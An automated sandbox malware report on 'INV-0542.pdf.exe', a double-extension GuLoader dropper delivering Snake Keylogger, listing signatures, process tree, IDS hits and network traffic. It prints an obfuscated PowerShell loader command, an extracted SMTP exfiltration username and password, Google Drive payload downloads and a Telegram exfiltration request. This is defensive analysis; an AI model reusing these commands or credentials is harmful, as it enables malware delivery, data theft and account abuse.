Edit tour

Windows Analysis Report
INV-0542.pdf.exe

Overview

General Information

Sample name:	INV-0542.pdf.exe
Analysis ID:	1562595
MD5:	fa02056b1a21f75efabdda81219fb7db
SHA1:	3e8dd711bfef09d2db54af75476765d85693c756
SHA256:	23be2a96f4c15306083c180774452e11f42837e297627cd33ad5a9708953cd4c
Tags:	exeuser-lowmal3
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Sigma detected: Suspicious Double Extension File Execution

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Initial sample is a PE file and has a suspicious name

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Sigma detected: Suspicious Double Extension Files

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

INV-0542.pdf.exe (PID: 2164 cmdline: "C:\Users\user\Desktop\INV-0542.pdf.exe" MD5: FA02056B1A21F75EFABDDA81219FB7DB)

powershell.exe (PID: 5776 cmdline: "powershell.exe" -windowstyle minimized "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkken.SubString(72926,3);.$Burhne($Bnkerkken)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 3652 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "donan@donan.es", "Password": "Logistica07", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000002.00000002.2422857141.0000000009AD2000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 3652	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 3652	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Double Extension File Execution

Source: Process started

Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\INV-0542.pdf.exe", CommandLine: "C:\Users\user\Desktop\INV-0542.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\INV-0542.pdf.exe, NewProcessName: C:\Users\user\Desktop\INV-0542.pdf.exe, OriginalFileName: C:\Users\user\Desktop\INV-0542.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\user\Desktop\INV-0542.pdf.exe", ProcessId: 2164, ProcessName: INV-0542.pdf.exe

Sigma detected: Suspicious Double Extension Files

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems), frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5776, TargetFilename: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\INV-0542.pdf.exe

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 172.217.19.174, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3652, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49756

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5776, TargetFilename: C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\INV-0542.pdf.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkken.SubString(72926,3);.$Burhne($Bnkerkken)" , CommandLine: "powershell.exe" -windowstyle minimized "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkken.SubString(72926,3);.$Burhne($Bnkerkken)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\INV-0542.pdf.exe", ParentImage: C:\Users\user\Desktop\INV-0542.pdf.exe, ParentProcessId: 2164, ParentProcessName: INV-0542.pdf.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Bnkerkken=Get-Content -Raw 'C:\Users\user\AppData\Roaming\interpellant\stimulere\Chemosis\Suborbiculated.Amb';$Burhne=$Bnkerkken.SubString(72926,3);.$Burhne($Bnkerkken)" , ProcessId: 5776, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T18:43:55.108638+0100	2803305	3	Unknown Traffic	192.168.2.5	49795	172.67.177.134	443	TCP
2024-11-25T18:44:02.858571+0100	2803305	3	Unknown Traffic	192.168.2.5	49815	172.67.177.134	443	TCP
2024-11-25T18:44:06.452041+0100	2803305	3	Unknown Traffic	192.168.2.5	49827	172.67.177.134	443	TCP
2024-11-25T18:44:09.842403+0100	2803305	3	Unknown Traffic	192.168.2.5	49834	172.67.177.134	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T18:43:50.306241+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49780	132.226.8.169	80	TCP
2024-11-25T18:43:53.368842+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49780	132.226.8.169	80	TCP
2024-11-25T18:43:57.587488+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49802	132.226.8.169	80	TCP
2024-11-25T18:44:01.165637+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49812	132.226.8.169	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-25T18:43:40.022486+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49756	172.217.19.174	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000005.00000002.3302092440.0000000021891000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "donan@donan.es", "Password": "Logistica07", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.3% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: INV-0542.pdf.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49789 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.5:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.5:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49870 version: TLS 1.2

Source: INV-0542.pdf.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.2420884473.0000000008216000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.2417683631.0000000006F63000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.2420884473.0000000008216000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000002.00000002.2420884473.00000000081A2000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Code function: 0_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C4D
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Code function: 0_2_00402930 FindFirstFileW,	0_2_00402930
Source: C:\Users\user\Desktop\INV-0542.pdf.exe	Code function: 0_2_0040689E FindFirstFileW,FindClose,	0_2_0040689E

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE6347h	5_2_23EE5FD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE6970h	5_2_23EE6678
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE42B6h	5_2_23EE3FE8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEF8E0h	5_2_23EEF5E8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE22C6h	5_2_23EE1FF8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE10BEh	5_2_23EE0DF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE8AE8h	5_2_23EE87F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEBAB8h	5_2_23EEB7C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEA2D0h	5_2_23EE9FD8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE3076h	5_2_23EE2DA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EED2A0h	5_2_23EECFA8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE1E47h	5_2_23EE1BA0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE9478h	5_2_23EE9180
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE5066h	5_2_23EE4D98
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE7C90h	5_2_23EE7998
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEEA88h	5_2_23EEE790
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEAC60h	5_2_23EEA968
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE0C2Eh	5_2_23EE0960
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE5E16h	5_2_23EE5B48
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE6E38h	5_2_23EE6B40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE3E26h	5_2_23EE3B58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEC448h	5_2_23EEC150
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE8620h	5_2_23EE8328
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEF418h	5_2_23EEF120
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEDC30h	5_2_23EED938
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE4BD7h	5_2_23EE4908
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE2BE6h	5_2_23EE2918
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE19DEh	5_2_23EE1710
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE9E08h	5_2_23EE9B10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EECDD8h	5_2_23EECAE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEB5F0h	5_2_23EEB2F8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE3996h	5_2_23EE36C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEE5C0h	5_2_23EEE2C8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE079Eh	5_2_23EE04D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE77C8h	5_2_23EE74D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEA798h	5_2_23EEA4A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE5986h	5_2_23EE56B8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE8FB0h	5_2_23EE8CB8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEFDA8h	5_2_23EEFAB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE2756h	5_2_23EE2488
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEBF80h	5_2_23EEBC88
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE154Eh	5_2_23EE1280
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE8158h	5_2_23EE7E60
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE4746h	5_2_23EE4478
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EED768h	5_2_23EED470
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE9940h	5_2_23EE9648
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE030Eh	5_2_23EE0040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEEF50h	5_2_23EEEC58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE54F6h	5_2_23EE5228
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE3506h	5_2_23EE3238
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEB128h	5_2_23EEAE30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EE7300h	5_2_23EE7008
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEE0F8h	5_2_23EEDE00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 23EEC910h	5_2_23EEC618

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:238576%0D%0ADate%20and%20Time:%2026/11/2024%20/%2020:06:18%0D%0ACountry%20Name:%20United%20States%0D%0A[%20238576%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 132.226.8.169 132.226.8.169
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 172.67.177.134 172.67.177.134

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49780 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49812 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49802 -> 132.226.8.169:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49795 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49815 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49834 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49827 -> 172.67.177.134:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49756 -> 172.217.19.174:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.5:49789 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1SmaC9S7fqnb0ijcHNtgXd-BJcvXHnnQ_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:238576%0D%0ADate%20and%20Time:%2026/11/2024%20/%2020:06:18%0D%0ACountry%20Name:%20United%20States%0D%0A[%20238576%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20] HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
